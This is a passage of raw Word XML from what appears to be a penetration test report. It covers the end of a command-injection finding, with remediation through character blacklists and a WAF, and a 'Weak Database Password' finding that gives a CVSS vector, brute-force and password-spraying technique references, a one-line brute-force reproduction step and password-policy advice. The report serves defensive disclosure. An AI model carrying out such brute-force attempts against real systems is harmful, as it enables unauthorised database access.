          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or blacklist of disapproved characters </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="785C3C56">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and reject any input that </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="345204AB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fails the check.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="720B3E80" w:rsidP="0D325B6E" w:rsidRDefault="720B3E80" w14:paraId="65497C24" w14:textId="1AE422BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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20B3E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilize a web application </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="720B3E80">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720B3E8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885C5B9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(WAF) </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="720B3E80">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to block dangerous requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2853009D" w:rsidP="0D325B6E" w:rsidRDefault="2853009D" w14:paraId="33D6B50E" w14:textId="08A49757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>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2853009D">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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B1F4A3D" w14:textId="7B5BC80B">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p>
    <w:p w:rsidR="1CF5FC06" w:rsidP="0D325B6E" w:rsidRDefault="1CF5FC06" w14:paraId="64D4D8BB" w14:textId="63636A57">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CF5FC0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89E490A" w:rsidP="0D325B6E" w:rsidRDefault="089E490A" w14:paraId="664FA06F" w14:textId="24B2BDA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79ba166341344f2a">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="089E490A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Command Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="089E490A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="089E490A" w:rsidP="0D325B6E" w:rsidRDefault="089E490A" w14:paraId="4409D4A2" w14:textId="71A0DBF9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R129846dc624947ed">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="089E490A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PortSwigger</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="089E490A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> - What is command injection?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="44EE2FD5" w:rsidP="0D325B6E" w:rsidRDefault="44EE2FD5" w14:paraId="5066905E" w14:textId="038D8E72">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R0cea3f3bf51f42f2">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="44EE2FD5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="52D61BB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve"> Networks</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="44EE2FD5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>: How to Deploy Web Application Firewalls</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="4E2D64E9" w14:textId="123E5ECB">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52918246" w14:textId="600AFDAA">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24699E5" w14:textId="46C64883">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788475BB" w14:textId="70EB2FFF">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22E271C4" w14:textId="6F769CE4">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72183120" w14:textId="05455936">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5D8DC9E" w14:textId="660DD5C7">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0A02D7CA" w14:textId="4987812E">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0EB3F6A5" w14:textId="25662E37">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73E1BC84" w14:textId="346B697B">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7B3A2F3" w14:textId="7F72D007">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70D2B07E" w14:textId="17EF813C">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2D8B8D9A" w14:textId="1A1DC359">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3AD0033" w14:textId="2EE6CDC9">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742673B3" w14:textId="24475242">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83D8292" w14:textId="4BD0C82F">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5D4AE5FD" w14:textId="60B868AB">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6975824A" w14:textId="0EA23145">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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="44FE405F" w14:textId="6334E92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408897137" w:id="1475094404"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1654E318">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1654E31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Weak Database Password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1475094404"/>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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="3C9CED96">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1E87CE" w14:textId="26939474">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09BB94" w14:textId="6415EBF5">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65A7A0E" w14:textId="6B2823B3">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1362662">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E3ACD8" w14:textId="7AF2C2E9">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2647751" w14:textId="664653DA">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AC2DCE9" w14:textId="73742A6F">
            <w:pPr>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E69191A" w14:textId="613F3CC7">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009284FA">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6223D4" w14:textId="642ACFFE">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1E31CE8" w14:textId="5D882DDA">
            <w:pPr>
              <w:spacing w:after="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0D46B80"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4350" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:sz="0"/>
              <w:left w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:bottom w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
              <w:right w:val="single" w:color="000000" w:themeColor="text1" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4378AADB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="1847E7D4">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0EDA54" w14:textId="3757062B">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126FF07" w14:textId="57F7B771">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" r:id="Ref796ac5319f4bbe">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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AC:L</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AT</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P</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>R</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U</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>C</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H</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V</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</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H</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VA</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SC</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S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>I</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S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6CB1ED5B">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9FE643" w14:textId="380738DB">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98AA466" w14:textId="70C2575A">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A859308" w14:textId="2B73F27E">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4f43f1d38f97430d">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110.003</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> - Brute Force: Password Spraying</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="79BED07F" w14:textId="0E41ECB2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R4b06640cab664194">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1110.001 - Brute Force: Password Guessing</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="511B1AF6">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23B3F749"/>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C530480" w14:textId="2835EFB5">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83D7397" w14:textId="3921D7B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rdac01cf63d424694">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="4A03A90F">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1788C17" w14:textId="2052E8D0">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0BB4368" w14:textId="3E31CD9F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="77EF6096" w14:textId="66ECEE9F">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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="40F10982" w14:textId="6719DB7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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="47E4FCC1" w14:textId="7A34B2A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pP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The</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w: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Database</w:t>
      </w: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password </w:t>
      </w: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was found to be weak and </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3CCEBA4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easily </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1654E318">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guessable through brute force attacks, allowing an attacker to have control over the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1F9F1DE8" w14:textId="1A8395A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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="000B0BDA" w14:textId="4E37DD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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="5514F7E6" w14:textId="3DE0932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and data leakage as an attacker that gains access to the database can view, </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51A1B7F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete,</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 and add arbitrary data to the database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1F946CA0" w14:textId="737DAA4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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="6EB95956" w14:textId="7EBDD3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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="37F7F6DF" w14:textId="681ABEF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Step 1: Run a brute force attack systematically guessing passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="699D0875" w14:textId="256D7C3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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="12374EE6" w14:textId="5FBA528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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="43389FE9" w14:textId="6B44512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654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="479977D1" w14:textId="2645EC34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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and enforce a strong password policy for all accounts to ensure attackers are unable </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60421BC0">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easily brute force passwords. As a baseline the followi</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ng </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mini</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mum</w:t>
      </w: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 policy is recommended:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="118447C1" w14:textId="6AF5A60A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87"/>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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="5A8FF866" w14:textId="4EBD281F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87"/>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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="04F4FE6E" w14:textId="2282FF80">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="87"/>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1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="2474D8D7" w14:textId="6D7FE410">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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w:rsidR="1654E318" w:rsidP="0D325B6E" w:rsidRDefault="1654E318" w14:paraId="14308F17" w14:textId="42803BF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
